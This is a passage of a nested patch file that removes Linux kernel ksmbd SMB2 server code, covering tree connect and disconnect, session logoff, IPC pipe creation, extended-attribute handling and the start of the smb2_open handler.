+-		pr_err("treename is NULL\n");
+-		status.ret = KSMBD_TREE_CONN_STATUS_ERROR;
+-		goto out_err1;
+-	}
+-
+-	name = ksmbd_extract_sharename(conn->um, treename);
+-	if (IS_ERR(name)) {
+-		status.ret = KSMBD_TREE_CONN_STATUS_ERROR;
+-		goto out_err1;
+-	}
+-
+-	ksmbd_debug(SMB, "tree connect request for tree %s treename %s\n",
+-		    name, treename);
+-
+-	status = ksmbd_tree_conn_connect(conn, sess, name);
+-	if (status.ret == KSMBD_TREE_CONN_STATUS_OK)
+-		rsp->hdr.Id.SyncId.TreeId = cpu_to_le32(status.tree_conn->id);
+-	else
+-		goto out_err1;
+-
+-	share = status.tree_conn->share_conf;
+-	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC share path request\n");
+-		rsp->ShareType = SMB2_SHARE_TYPE_PIPE;
+-		rsp->MaximalAccess = FILE_READ_DATA_LE | FILE_READ_EA_LE |
+-			FILE_EXECUTE_LE | FILE_READ_ATTRIBUTES_LE |
+-			FILE_DELETE_LE | FILE_READ_CONTROL_LE |
+-			FILE_WRITE_DAC_LE | FILE_WRITE_OWNER_LE |
+-			FILE_SYNCHRONIZE_LE;
+-	} else {
+-		rsp->ShareType = SMB2_SHARE_TYPE_DISK;
+-		rsp->MaximalAccess = FILE_READ_DATA_LE | FILE_READ_EA_LE |
+-			FILE_EXECUTE_LE | FILE_READ_ATTRIBUTES_LE;
+-		if (test_tree_conn_flag(status.tree_conn,
+-					KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			rsp->MaximalAccess |= FILE_WRITE_DATA_LE |
+-				FILE_APPEND_DATA_LE | FILE_WRITE_EA_LE |
+-				FILE_DELETE_LE | FILE_WRITE_ATTRIBUTES_LE |
+-				FILE_DELETE_CHILD_LE | FILE_READ_CONTROL_LE |
+-				FILE_WRITE_DAC_LE | FILE_WRITE_OWNER_LE |
+-				FILE_SYNCHRONIZE_LE;
+-		}
+-	}
+-
+-	status.tree_conn->maximal_access = le32_to_cpu(rsp->MaximalAccess);
+-	if (conn->posix_ext_supported)
+-		status.tree_conn->posix_extensions = true;
+-
+-	rsp->StructureSize = cpu_to_le16(16);
+-	inc_rfc1001_len(work->response_buf, 16);
+-out_err1:
+-	rsp->Capabilities = 0;
+-	rsp->Reserved = 0;
+-	/* default manual caching */
+-	rsp->ShareFlags = SMB2_SHAREFLAG_MANUAL_CACHING;
+-
+-	if (!IS_ERR(treename))
+-		kfree(treename);
+-	if (!IS_ERR(name))
+-		kfree(name);
+-
+-	switch (status.ret) {
+-	case KSMBD_TREE_CONN_STATUS_OK:
+-		rsp->hdr.Status = STATUS_SUCCESS;
+-		rc = 0;
+-		break;
+-	case -ESTALE:
+-	case -ENOENT:
+-	case KSMBD_TREE_CONN_STATUS_NO_SHARE:
+-		rsp->hdr.Status = STATUS_BAD_NETWORK_NAME;
+-		break;
+-	case -ENOMEM:
+-	case KSMBD_TREE_CONN_STATUS_NOMEM:
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-		break;
+-	case KSMBD_TREE_CONN_STATUS_ERROR:
+-	case KSMBD_TREE_CONN_STATUS_TOO_MANY_CONNS:
+-	case KSMBD_TREE_CONN_STATUS_TOO_MANY_SESSIONS:
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		break;
+-	case -EINVAL:
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		break;
+-	default:
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	}
+-
+-	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
+-		smb2_set_err_rsp(work);
+-
+-	return rc;
+-}
+-
+-/**
+- * smb2_create_open_flags() - convert smb open flags to unix open flags
+- * @file_present:	is file already present
+- * @access:		file access flags
+- * @disposition:	file disposition flags
+- * @may_flags:		set with MAY_ flags
+- *
+- * Return:      file open flags
+- */
+-static int smb2_create_open_flags(bool file_present, __le32 access,
+-				  __le32 disposition,
+-				  int *may_flags)
+-{
+-	int oflags = O_NONBLOCK | O_LARGEFILE;
+-
+-	if (access & FILE_READ_DESIRED_ACCESS_LE &&
+-	    access & FILE_WRITE_DESIRE_ACCESS_LE) {
+-		oflags |= O_RDWR;
+-		*may_flags = MAY_OPEN | MAY_READ | MAY_WRITE;
+-	} else if (access & FILE_WRITE_DESIRE_ACCESS_LE) {
+-		oflags |= O_WRONLY;
+-		*may_flags = MAY_OPEN | MAY_WRITE;
+-	} else {
+-		oflags |= O_RDONLY;
+-		*may_flags = MAY_OPEN | MAY_READ;
+-	}
+-
+-	if (access == FILE_READ_ATTRIBUTES_LE)
+-		oflags |= O_PATH;
+-
+-	if (file_present) {
+-		switch (disposition & FILE_CREATE_MASK_LE) {
+-		case FILE_OPEN_LE:
+-		case FILE_CREATE_LE:
+-			break;
+-		case FILE_SUPERSEDE_LE:
+-		case FILE_OVERWRITE_LE:
+-		case FILE_OVERWRITE_IF_LE:
+-			oflags |= O_TRUNC;
+-			break;
+-		default:
+-			break;
+-		}
+-	} else {
+-		switch (disposition & FILE_CREATE_MASK_LE) {
+-		case FILE_SUPERSEDE_LE:
+-		case FILE_CREATE_LE:
+-		case FILE_OPEN_IF_LE:
+-		case FILE_OVERWRITE_IF_LE:
+-			oflags |= O_CREAT;
+-			break;
+-		case FILE_OPEN_LE:
+-		case FILE_OVERWRITE_LE:
+-			oflags &= ~O_CREAT;
+-			break;
+-		default:
+-			break;
+-		}
+-	}
+-
+-	return oflags;
+-}
+-
+-/**
+- * smb2_tree_disconnect() - handler for smb tree connect request
+- * @work:	smb work containing request buffer
+- *
+- * Return:      0
+- */
+-int smb2_tree_disconnect(struct ksmbd_work *work)
+-{
+-	struct smb2_tree_disconnect_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_tree_connect *tcon = work->tcon;
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	inc_rfc1001_len(work->response_buf, 4);
+-
+-	ksmbd_debug(SMB, "request\n");
+-
+-	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
+-		struct smb2_tree_disconnect_req *req =
+-			smb2_get_msg(work->request_buf);
+-
+-		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+-
+-		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+-		smb2_set_err_rsp(work);
+-		return 0;
+-	}
+-
+-	ksmbd_close_tree_conn_fds(work);
+-	ksmbd_tree_conn_disconnect(sess, tcon);
+-	work->tcon = NULL;
+-	return 0;
+-}
+-
+-/**
+- * smb2_session_logoff() - handler for session log off request
+- * @work:	smb work containing request buffer
+- *
+- * Return:      0
+- */
+-int smb2_session_logoff(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess;
+-	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
+-	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	inc_rfc1001_len(work->response_buf, 4);
+-
+-	ksmbd_debug(SMB, "request\n");
+-
+-	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
+-	ksmbd_close_session_fds(work);
+-	ksmbd_conn_wait_idle(conn, sess_id);
+-
+-	/*
+-	 * Re-lookup session to validate if session is deleted
+-	 * while waiting request complete
+-	 */
+-	sess = ksmbd_session_lookup_all(conn, sess_id);
+-	if (ksmbd_tree_conn_session_logoff(sess)) {
+-		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+-		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+-		smb2_set_err_rsp(work);
+-		return 0;
+-	}
+-
+-	ksmbd_destroy_file_table(&sess->file_table);
+-	sess->state = SMB2_SESSION_EXPIRED;
+-
+-	ksmbd_free_user(sess->user);
+-	sess->user = NULL;
+-	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
+-	return 0;
+-}
+-
+-/**
+- * create_smb2_pipe() - create IPC pipe
+- * @work:	smb work containing request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-static noinline int create_smb2_pipe(struct ksmbd_work *work)
+-{
+-	struct smb2_create_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct smb2_create_req *req = smb2_get_msg(work->request_buf);
+-	int id;
+-	int err;
+-	char *name;
+-
+-	name = smb_strndup_from_utf16(req->Buffer, le16_to_cpu(req->NameLength),
+-				      1, work->conn->local_nls);
+-	if (IS_ERR(name)) {
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-		err = PTR_ERR(name);
+-		goto out;
+-	}
+-
+-	id = ksmbd_session_rpc_open(work->sess, name);
+-	if (id < 0) {
+-		pr_err("Unable to open RPC pipe: %d\n", id);
+-		err = id;
+-		goto out;
+-	}
+-
+-	rsp->hdr.Status = STATUS_SUCCESS;
+-	rsp->StructureSize = cpu_to_le16(89);
+-	rsp->OplockLevel = SMB2_OPLOCK_LEVEL_NONE;
+-	rsp->Flags = 0;
+-	rsp->CreateAction = cpu_to_le32(FILE_OPENED);
+-
+-	rsp->CreationTime = cpu_to_le64(0);
+-	rsp->LastAccessTime = cpu_to_le64(0);
+-	rsp->ChangeTime = cpu_to_le64(0);
+-	rsp->AllocationSize = cpu_to_le64(0);
+-	rsp->EndofFile = cpu_to_le64(0);
+-	rsp->FileAttributes = FILE_ATTRIBUTE_NORMAL_LE;
+-	rsp->Reserved2 = 0;
+-	rsp->VolatileFileId = id;
+-	rsp->PersistentFileId = 0;
+-	rsp->CreateContextsOffset = 0;
+-	rsp->CreateContextsLength = 0;
+-
+-	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1*/
+-	kfree(name);
+-	return 0;
+-
+-out:
+-	switch (err) {
+-	case -EINVAL:
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		break;
+-	case -ENOSPC:
+-	case -ENOMEM:
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-		break;
+-	}
+-
+-	if (!IS_ERR(name))
+-		kfree(name);
+-
+-	smb2_set_err_rsp(work);
+-	return err;
+-}
+-
+-/**
+- * smb2_set_ea() - handler for setting extended attributes using set
+- *		info command
+- * @eabuf:	set info command buffer
+- * @buf_len:	set info command buffer length
+- * @path:	dentry path for get ea
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
+-		       const struct path *path)
+-{
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	char *attr_name = NULL, *value;
+-	int rc = 0;
+-	unsigned int next = 0;
+-
+-	if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength +
+-			le16_to_cpu(eabuf->EaValueLength))
+-		return -EINVAL;
+-
+-	attr_name = kmalloc(XATTR_NAME_MAX + 1, GFP_KERNEL);
+-	if (!attr_name)
+-		return -ENOMEM;
+-
+-	do {
+-		if (!eabuf->EaNameLength)
+-			goto next;
+-
+-		ksmbd_debug(SMB,
+-			    "name : <%s>, name_len : %u, value_len : %u, next : %u\n",
+-			    eabuf->name, eabuf->EaNameLength,
+-			    le16_to_cpu(eabuf->EaValueLength),
+-			    le32_to_cpu(eabuf->NextEntryOffset));
+-
+-		if (eabuf->EaNameLength >
+-		    (XATTR_NAME_MAX - XATTR_USER_PREFIX_LEN)) {
+-			rc = -EINVAL;
+-			break;
+-		}
+-
+-		memcpy(attr_name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN);
+-		memcpy(&attr_name[XATTR_USER_PREFIX_LEN], eabuf->name,
+-		       eabuf->EaNameLength);
+-		attr_name[XATTR_USER_PREFIX_LEN + eabuf->EaNameLength] = '\0';
+-		value = (char *)&eabuf->name + eabuf->EaNameLength + 1;
+-
+-		if (!eabuf->EaValueLength) {
+-			rc = ksmbd_vfs_casexattr_len(user_ns,
+-						     path->dentry,
+-						     attr_name,
+-						     XATTR_USER_PREFIX_LEN +
+-						     eabuf->EaNameLength);
+-
+-			/* delete the EA only when it exits */
+-			if (rc > 0) {
+-				rc = ksmbd_vfs_remove_xattr(user_ns,
+-							    path->dentry,
+-							    attr_name);
+-
+-				if (rc < 0) {
+-					ksmbd_debug(SMB,
+-						    "remove xattr failed(%d)\n",
+-						    rc);
+-					break;
+-				}
+-			}
+-
+-			/* if the EA doesn't exist, just do nothing. */
+-			rc = 0;
+-		} else {
+-			rc = ksmbd_vfs_setxattr(user_ns,
+-						path->dentry, attr_name, value,
+-						le16_to_cpu(eabuf->EaValueLength), 0);
+-			if (rc < 0) {
+-				ksmbd_debug(SMB,
+-					    "ksmbd_vfs_setxattr is failed(%d)\n",
+-					    rc);
+-				break;
+-			}
+-		}
+-
+-next:
+-		next = le32_to_cpu(eabuf->NextEntryOffset);
+-		if (next == 0 || buf_len < next)
+-			break;
+-		buf_len -= next;
+-		eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
+-		if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
+-			break;
+-
+-	} while (next != 0);
+-
+-	kfree(attr_name);
+-	return rc;
+-}
+-
+-static noinline int smb2_set_stream_name_xattr(const struct path *path,
+-					       struct ksmbd_file *fp,
+-					       char *stream_name, int s_type)
+-{
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	size_t xattr_stream_size;
+-	char *xattr_stream_name;
+-	int rc;
+-
+-	rc = ksmbd_vfs_xattr_stream_name(stream_name,
+-					 &xattr_stream_name,
+-					 &xattr_stream_size,
+-					 s_type);
+-	if (rc)
+-		return rc;
+-
+-	fp->stream.name = xattr_stream_name;
+-	fp->stream.size = xattr_stream_size;
+-
+-	/* Check if there is stream prefix in xattr space */
+-	rc = ksmbd_vfs_casexattr_len(user_ns,
+-				     path->dentry,
+-				     xattr_stream_name,
+-				     xattr_stream_size);
+-	if (rc >= 0)
+-		return 0;
+-
+-	if (fp->cdoption == FILE_OPEN_LE) {
+-		ksmbd_debug(SMB, "XATTR stream name lookup failed: %d\n", rc);
+-		return -EBADF;
+-	}
+-
+-	rc = ksmbd_vfs_setxattr(user_ns, path->dentry,
+-				xattr_stream_name, NULL, 0, 0);
+-	if (rc < 0)
+-		pr_err("Failed to store XATTR stream name :%d\n", rc);
+-	return 0;
+-}
+-
+-static int smb2_remove_smb_xattrs(const struct path *path)
+-{
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	char *name, *xattr_list = NULL;
+-	ssize_t xattr_list_len;
+-	int err = 0;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+-	if (xattr_list_len < 0) {
+-		goto out;
+-	} else if (!xattr_list_len) {
+-		ksmbd_debug(SMB, "empty xattr in the file\n");
+-		goto out;
+-	}
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-			name += strlen(name) + 1) {
+-		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
+-
+-		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN) &&
+-		    !strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
+-			     STREAM_PREFIX_LEN)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, path->dentry,
+-						     name);
+-			if (err)
+-				ksmbd_debug(SMB, "remove xattr failed : %s\n",
+-					    name);
+-		}
+-	}
+-out:
+-	kvfree(xattr_list);
+-	return err;
+-}
+-
+-static int smb2_create_truncate(const struct path *path)
+-{
+-	int rc = vfs_truncate(path, 0);
+-
+-	if (rc) {
+-		pr_err("vfs_truncate failed, rc %d\n", rc);
+-		return rc;
+-	}
+-
+-	rc = smb2_remove_smb_xattrs(path);
+-	if (rc == -EOPNOTSUPP)
+-		rc = 0;
+-	if (rc)
+-		ksmbd_debug(SMB,
+-			    "ksmbd_truncate_stream_name_xattr failed, rc %d\n",
+-			    rc);
+-	return rc;
+-}
+-
+-static void smb2_new_xattrs(struct ksmbd_tree_connect *tcon, const struct path *path,
+-			    struct ksmbd_file *fp)
+-{
+-	struct xattr_dos_attrib da = {0};
+-	int rc;
+-
+-	if (!test_share_config_flag(tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_STORE_DOS_ATTRS))
+-		return;
+-
+-	da.version = 4;
+-	da.attr = le32_to_cpu(fp->f_ci->m_fattr);
+-	da.itime = da.create_time = fp->create_time;
+-	da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
+-		XATTR_DOSINFO_ITIME;
+-
+-	rc = ksmbd_vfs_set_dos_attrib_xattr(mnt_user_ns(path->mnt),
+-					    path->dentry, &da);
+-	if (rc)
+-		ksmbd_debug(SMB, "failed to store file attribute into xattr\n");
+-}
+-
+-static void smb2_update_xattrs(struct ksmbd_tree_connect *tcon,
+-			       const struct path *path, struct ksmbd_file *fp)
+-{
+-	struct xattr_dos_attrib da;
+-	int rc;
+-
+-	fp->f_ci->m_fattr &= ~(FILE_ATTRIBUTE_HIDDEN_LE | FILE_ATTRIBUTE_SYSTEM_LE);
+-
+-	/* get FileAttributes from XATTR_NAME_DOS_ATTRIBUTE */
+-	if (!test_share_config_flag(tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_STORE_DOS_ATTRS))
+-		return;
+-
+-	rc = ksmbd_vfs_get_dos_attrib_xattr(mnt_user_ns(path->mnt),
+-					    path->dentry, &da);
+-	if (rc > 0) {
+-		fp->f_ci->m_fattr = cpu_to_le32(da.attr);
+-		fp->create_time = da.create_time;
+-		fp->itime = da.itime;
+-	}
+-}
+-
+-static int smb2_creat(struct ksmbd_work *work, struct path *path, char *name,
+-		      int open_flags, umode_t posix_mode, bool is_dir)
+-{
+-	struct ksmbd_tree_connect *tcon = work->tcon;
+-	struct ksmbd_share_config *share = tcon->share_conf;
+-	umode_t mode;
+-	int rc;
+-
+-	if (!(open_flags & O_CREAT))
+-		return -EBADF;
+-
+-	ksmbd_debug(SMB, "file does not exist, so creating\n");
+-	if (is_dir == true) {
+-		ksmbd_debug(SMB, "creating directory\n");
+-
+-		mode = share_config_directory_mode(share, posix_mode);
+-		rc = ksmbd_vfs_mkdir(work, name, mode);
+-		if (rc)
+-			return rc;
+-	} else {
+-		ksmbd_debug(SMB, "creating regular file\n");
+-
+-		mode = share_config_create_mode(share, posix_mode);
+-		rc = ksmbd_vfs_create(work, name, mode);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	rc = ksmbd_vfs_kern_path(work, name, 0, path, 0);
+-	if (rc) {
+-		pr_err("cannot get linux path (%s), err = %d\n",
+-		       name, rc);
+-		return rc;
+-	}
+-	return 0;
+-}
+-
+-static int smb2_create_sd_buffer(struct ksmbd_work *work,
+-				 struct smb2_create_req *req,
+-				 const struct path *path)
+-{
+-	struct create_context *context;
+-	struct create_sd_buf_req *sd_buf;
+-
+-	if (!req->CreateContextsOffset)
+-		return -ENOENT;
+-
+-	/* Parse SD BUFFER create contexts */
+-	context = smb2_find_context_vals(req, SMB2_CREATE_SD_BUFFER, 4);
+-	if (!context)
+-		return -ENOENT;
+-	else if (IS_ERR(context))
+-		return PTR_ERR(context);
+-
+-	ksmbd_debug(SMB,
+-		    "Set ACLs using SMB2_CREATE_SD_BUFFER context\n");
+-	sd_buf = (struct create_sd_buf_req *)context;
+-	if (le16_to_cpu(context->DataOffset) +
+-	    le32_to_cpu(context->DataLength) <
+-	    sizeof(struct create_sd_buf_req))
+-		return -EINVAL;
+-	return set_info_sec(work->conn, work->tcon, path, &sd_buf->ntsd,
+-			    le32_to_cpu(sd_buf->ccontext.DataLength), true);
+-}
+-
+-static void ksmbd_acls_fattr(struct smb_fattr *fattr,
+-			     struct user_namespace *mnt_userns,
+-			     struct inode *inode)
+-{
+-	vfsuid_t vfsuid = i_uid_into_vfsuid(mnt_userns, inode);
+-	vfsgid_t vfsgid = i_gid_into_vfsgid(mnt_userns, inode);
+-
+-	fattr->cf_uid = vfsuid_into_kuid(vfsuid);
+-	fattr->cf_gid = vfsgid_into_kgid(vfsgid);
+-	fattr->cf_mode = inode->i_mode;
+-	fattr->cf_acls = NULL;
+-	fattr->cf_dacls = NULL;
+-
+-	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+-		fattr->cf_acls = get_acl(inode, ACL_TYPE_ACCESS);
+-		if (S_ISDIR(inode->i_mode))
+-			fattr->cf_dacls = get_acl(inode, ACL_TYPE_DEFAULT);
+-	}
+-}
+-
+-/**
+- * smb2_open() - handler for smb file open request
+- * @work:	smb work containing request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-int smb2_open(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_tree_connect *tcon = work->tcon;
+-	struct smb2_create_req *req;
+-	struct smb2_create_rsp *rsp;
+-	struct path path;
+-	struct ksmbd_share_config *share = tcon->share_conf;
+-	struct ksmbd_file *fp = NULL;
+-	struct file *filp = NULL;
+-	struct user_namespace *user_ns = NULL;
+-	struct kstat stat;
+-	struct create_context *context;
+-	struct lease_ctx_info *lc = NULL;
+-	struct create_ea_buf_req *ea_buf = NULL;
+-	struct oplock_info *opinfo;
+-	__le32 *next_ptr = NULL;
+-	int req_op_level = 0, open_flags = 0, may_flags = 0, file_info = 0;
+-	int rc = 0;
+-	int contxt_cnt = 0, query_disk_id = 0;
+-	int maximal_access_ctxt = 0, posix_ctxt = 0;
+-	int s_type = 0;
+-	int next_off = 0;
+-	char *name = NULL;
+-	char *stream_name = NULL;
+-	bool file_present = false, created = false, already_permitted = false;
+-	int share_ret, need_truncate = 0;
+-	u64 time;
+-	umode_t posix_mode = 0;
+-	__le32 daccess, maximal_access = 0;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (req->hdr.NextCommand && !work->next_smb2_rcv_hdr_off &&
+-	    (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)) {
+-		ksmbd_debug(SMB, "invalid flag in chained command\n");
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		smb2_set_err_rsp(work);
+-		return -EINVAL;
+-	}
+-
+-	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC pipe create request\n");
+-		return create_smb2_pipe(work);
+-	}
+-
+-	if (req->NameLength) {
+-		if ((req->CreateOptions & FILE_DIRECTORY_FILE_LE) &&
+-		    *(char *)req->Buffer == '\\') {
+-			pr_err("not allow directory name included leading slash\n");
+-			rc = -EINVAL;
+-			goto err_out1;
+-		}
+-
+-		name = smb2_get_name(req->Buffer,
+-				     le16_to_cpu(req->NameLength),
+-				     work->conn->local_nls);
+-		if (IS_ERR(name)) {
+-			rc = PTR_ERR(name);
+-			if (rc != -ENOMEM)
+-				rc = -ENOENT;
+-			name = NULL;
+-			goto err_out1;
+-		}
+-
+-		ksmbd_debug(SMB, "converted name = %s\n", name);
+-		if (strchr(name, ':')) {
+-			if (!test_share_config_flag(work->tcon->share_conf,
+-						    KSMBD_SHARE_FLAG_STREAMS)) {
+-				rc = -EBADF;
+-				goto err_out1;
+-			}
+-			rc = parse_stream_name(name, &stream_name, &s_type);
+-			if (rc < 0)
+-				goto err_out1;
+-		}
+-
+-		rc = ksmbd_validate_filename(name);
+-		if (rc < 0)
+-			goto err_out1;
+-
+-		if (ksmbd_share_veto_filename(share, name)) {
+-			rc = -ENOENT;
+-			ksmbd_debug(SMB, "Reject open(), vetoed file: %s\n",
+-				    name);
+-			goto err_out1;
+-		}
+-	} else {
+-		name = kstrdup("", GFP_KERNEL);
+-		if (!name) {
+-			rc = -ENOMEM;
+-			goto err_out1;
+-		}
+-	}
+-
+-	req_op_level = req->RequestedOplockLevel;
+-	if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE)
+-		lc = parse_lease_state(req);
+-
+-	if (le32_to_cpu(req->ImpersonationLevel) > le32_to_cpu(IL_DELEGATE)) {
+-		pr_err("Invalid impersonationlevel : 0x%x\n",
+-		       le32_to_cpu(req->ImpersonationLevel));
+-		rc = -EIO;
+-		rsp->hdr.Status = STATUS_BAD_IMPERSONATION_LEVEL;
+-		goto err_out1;
+-	}
+-
+-	if (req->CreateOptions && !(req->CreateOptions & CREATE_OPTIONS_MASK_LE)) {
+-		pr_err("Invalid create options : 0x%x\n",
+-		       le32_to_cpu(req->CreateOptions));
+-		rc = -EINVAL;
+-		goto err_out1;
+-	} else {
+-		if (req->CreateOptions & FILE_SEQUENTIAL_ONLY_LE &&
+-		    req->CreateOptions & FILE_RANDOM_ACCESS_LE)
+-			req->CreateOptions = ~(FILE_SEQUENTIAL_ONLY_LE);
+-
+-		if (req->CreateOptions &
+-		    (FILE_OPEN_BY_FILE_ID_LE | CREATE_TREE_CONNECTION |
+-		     FILE_RESERVE_OPFILTER_LE)) {
+-			rc = -EOPNOTSUPP;
+-			goto err_out1;
+-		}
+-
+-		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
+-			if (req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE) {
+-				rc = -EINVAL;
+-				goto err_out1;
+-			} else if (req->CreateOptions & FILE_NO_COMPRESSION_LE) {
+-				req->CreateOptions = ~(FILE_NO_COMPRESSION_LE);
+-			}
+-		}
+-	}
+-
+-	if (le32_to_cpu(req->CreateDisposition) >
+-	    le32_to_cpu(FILE_OVERWRITE_IF_LE)) {
+-		pr_err("Invalid create disposition : 0x%x\n",
+-		       le32_to_cpu(req->CreateDisposition));
+-		rc = -EINVAL;
+-		goto err_out1;
+-	}
+-
+-	if (!(req->DesiredAccess & DESIRED_ACCESS_MASK)) {
+-		pr_err("Invalid desired access : 0x%x\n",
+-		       le32_to_cpu(req->DesiredAccess));
+-		rc = -EACCES;
+-		goto err_out1;
+-	}
+-
+-	if (req->FileAttributes && !(req->FileAttributes & FILE_ATTRIBUTE_MASK_LE)) {
+-		pr_err("Invalid file attribute : 0x%x\n",
+-		       le32_to_cpu(req->FileAttributes));
+-		rc = -EINVAL;
+-		goto err_out1;
+-	}
+-
+-	if (req->CreateContextsOffset) {
+-		/* Parse non-durable handle create contexts */
+-		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER, 4);
+-		if (IS_ERR(context)) {
+-			rc = PTR_ERR(context);
+-			goto err_out1;
+-		} else if (context) {
+-			ea_buf = (struct create_ea_buf_req *)context;
+-			if (le16_to_cpu(context->DataOffset) +
+-			    le32_to_cpu(context->DataLength) <
+-			    sizeof(struct create_ea_buf_req)) {
+-				rc = -EINVAL;
+-				goto err_out1;
+-			}
+-			if (req->CreateOptions & FILE_NO_EA_KNOWLEDGE_LE) {
+-				rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-				rc = -EACCES;
+-				goto err_out1;
+-			}
+-		}
+-
+-		context = smb2_find_context_vals(req,
+-						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST, 4);
+-		if (IS_ERR(context)) {
+-			rc = PTR_ERR(context);
+-			goto err_out1;
+-		} else if (context) {
+-			ksmbd_debug(SMB,
+-				    "get query maximal access context\n");
+-			maximal_access_ctxt = 1;
+-		}
+-
+-		context = smb2_find_context_vals(req,
+-						 SMB2_CREATE_TIMEWARP_REQUEST, 4);
+-		if (IS_ERR(context)) {
+-			rc = PTR_ERR(context);
+-			goto err_out1;
+-		} else if (context) {
+-			ksmbd_debug(SMB, "get timewarp context\n");
+-			rc = -EBADF;
+-			goto err_out1;
+-		}
+-
+-		if (tcon->posix_extensions) {
+-			context = smb2_find_context_vals(req,
+-							 SMB2_CREATE_TAG_POSIX, 16);
+-			if (IS_ERR(context)) {
+-				rc = PTR_ERR(context);
+-				goto err_out1;
+-			} else if (context) {
+-				struct create_posix *posix =
+-					(struct create_posix *)context;
+-				if (le16_to_cpu(context->DataOffset) +
+-				    le32_to_cpu(context->DataLength) <
+-				    sizeof(struct create_posix) - 4) {
+-					rc = -EINVAL;
+-					goto err_out1;
+-				}
+-				ksmbd_debug(SMB, "get posix context\n");
+-
+-				posix_mode = le32_to_cpu(posix->Mode);
+-				posix_ctxt = 1;
+-			}
+-		}
+-	}
+-
+-	if (ksmbd_override_fsids(work)) {
+-		rc = -ENOMEM;
+-		goto err_out1;
+-	}
+-
+-	rc = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, 1);
+-	if (!rc) {
+-		if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE) {
+-			/*
+-			 * If file exists with under flags, return access
+-			 * denied error.
+-			 */
+-			if (req->CreateDisposition == FILE_OVERWRITE_IF_LE ||
+-			    req->CreateDisposition == FILE_OPEN_IF_LE) {
+-				rc = -EACCES;
+-				path_put(&path);
+-				goto err_out;
+-			}
+-
+-			if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-				ksmbd_debug(SMB,
+-					    "User does not have write permission\n");
+-				rc = -EACCES;
+-				path_put(&path);
+-				goto err_out;
+-			}
+-		} else if (d_is_symlink(path.dentry)) {
+-			rc = -EACCES;
+-			path_put(&path);
+-			goto err_out;
+-		}
+-	}
+-
+-	if (rc) {
+-		if (rc != -ENOENT)
+-			goto err_out;
+-		ksmbd_debug(SMB, "can not get linux path for %s, rc = %d\n",
+-			    name, rc);
+-		rc = 0;
+-	} else {
+-		file_present = true;
+-		user_ns = mnt_user_ns(path.mnt);
+-	}
+-	if (stream_name) {
+-		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
+-			if (s_type == DATA_STREAM) {
+-				rc = -EIO;
